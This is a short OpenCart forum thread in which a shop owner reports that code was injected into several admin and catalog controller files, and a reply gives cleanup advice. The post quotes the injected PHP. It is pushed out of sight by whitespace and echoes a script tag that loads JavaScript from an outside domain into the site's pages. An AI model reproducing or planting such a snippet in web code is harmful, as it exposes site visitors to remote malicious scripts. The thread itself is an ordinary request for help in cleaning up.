OpenCart Community

OpenCart Community Forum - Discuss shopping cart and e-commerce solutions.
https://forum.opencart.com/

Code injection on OC 1.4.8b

https://forum.opencart.com/viewtopic.php?t=119474

Page 1 of 1

Code injection on OC 1.4.8b

Posted: Mon Feb 10, 2014 6:06 am
by alfaone78
Hi!

I' ve a site on OC 1.4.8b since 2011.
This week the site was attacked for 2 time with code injection.
I' ve find malicious string in the end of different file in catalog and admin.
In admin/controller/common/footer - header - home - login
in catalog/controller/account/login
in catalog/controller/common/header - footer - home

The text added to the end of file are like this

Code: Select all

<?php
#2cbb20#
                                                                                                                                                                                                                                                          if(empty($o)) {$o = "<script type=\"text/javascript\" src=\"http://lind.abckunden.de/clik.php?id=3891699\"></script>";echo $o;}
#/2cbb20#
?>
How is possible? Some knowed vulnerability?
Thanks

Salvo

Re: Code injection on OC 1.4.8b

Posted: Mon Feb 10, 2014 4:12 pm
by k2tec
Something to read http://forum.opencart.com/viewtopic.php?f=19&t=26388
This one is okay security-OC-1.0.zip.
But change al your passwords( strong password and not your name or abc123456) OC admin, FTP and your hosting controle panel.
Know for sure all your file are clean.
If you are on a shared server it's posible that server is infected.
Make sure your PC is not infected.
All times are UTC+08:00
Page 1 of 1
Powered by phpBB® Forum Software © phpBB Limited
https://www.phpbb.com/